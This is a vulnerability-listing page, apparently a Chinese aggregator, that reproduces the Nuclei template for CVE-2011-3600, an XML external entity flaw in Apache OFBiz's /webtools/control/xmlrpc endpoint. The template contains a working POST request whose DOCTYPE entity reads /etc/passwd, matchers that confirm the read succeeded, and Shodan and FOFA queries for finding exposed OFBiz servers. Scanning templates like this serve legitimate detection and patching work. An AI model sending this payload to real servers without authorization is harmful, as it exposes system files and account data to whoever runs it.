CVE-2011-3600: Apache OFBiz - XML External Entity Injection

日期: 2026-01-08 | 影响软件: Apache OFBiz | POC: 已公开

漏洞描述

The /webtools/control/xmlrpc endpoint in OFBiz XML-RPC event handler is exposed to External Entity Injection by passing DOCTYPE declarations with executable payloads that discloses the contents of files in the filesystem. In addition, it can also be used to probe for open network ports, and figure out from returned error messages whether a file exists or not. This affects OFBiz 16.11.01 to 16.11.04.

PoC代码[已公开]

id: CVE-2011-3600

info:
  name: Apache OFBiz - XML External Entity Injection
  author: daffainfo,pikpikcu
  severity: high
  description: |
    The /webtools/control/xmlrpc endpoint in OFBiz XML-RPC event handler is exposed to External Entity Injection by passing DOCTYPE declarations with executable payloads that discloses the contents of files in the filesystem. In addition, it can also be used to probe for open network ports, and figure out from returned error messages whether a file exists or not. This affects OFBiz 16.11.01 to 16.11.04.
  impact: |
    Attackers can disclose sensitive filesystem data, probe network ports, and determine file existence, leading to information disclosure and potential further exploitation.
  remediation: |
    Update to the latest OFBiz version or apply security patches addressing XML external entity vulnerabilities.
  reference:
    - https://lists.apache.org/thread/cwz2v0b6pnxvqrnsd0hj3l80g9qq5kd8
    - https://nvd.nist.gov/vuln/detail/CVE-2011-3600
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2011-3600
    cwe-id: CWE-611
    epss-score: 0.02132
    epss-percentile: 0.83708
    cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: ofbiz
    shodan-query:
      - http.html:"ofbiz"
      - ofbiz.visitor=
    fofa-query:
      - body="ofbiz"
      - app="apache_ofbiz"
  tags: cve,cve2011,apache,ofbiz,xxe,vuln,kev,vkev

http:
  - raw:
      - |
        POST /webtools/control/xmlrpc HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0"?><!DOCTYPE x [<!ENTITY disclose SYSTEM "file:////etc/passwd">]><methodCall><methodName>&disclose;</methodName></methodCall>

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "faultString"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207c61b2e3f90b25b54a764834f5633c2e0af931fb1bcee2eaee09bff7b6a9b06f022100f089aa10be60bcc40f5019d085f02f6a06a1fec4517b3d0c47807506c78ed353:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2011/CVE-2011-3600.yaml

相关漏洞推荐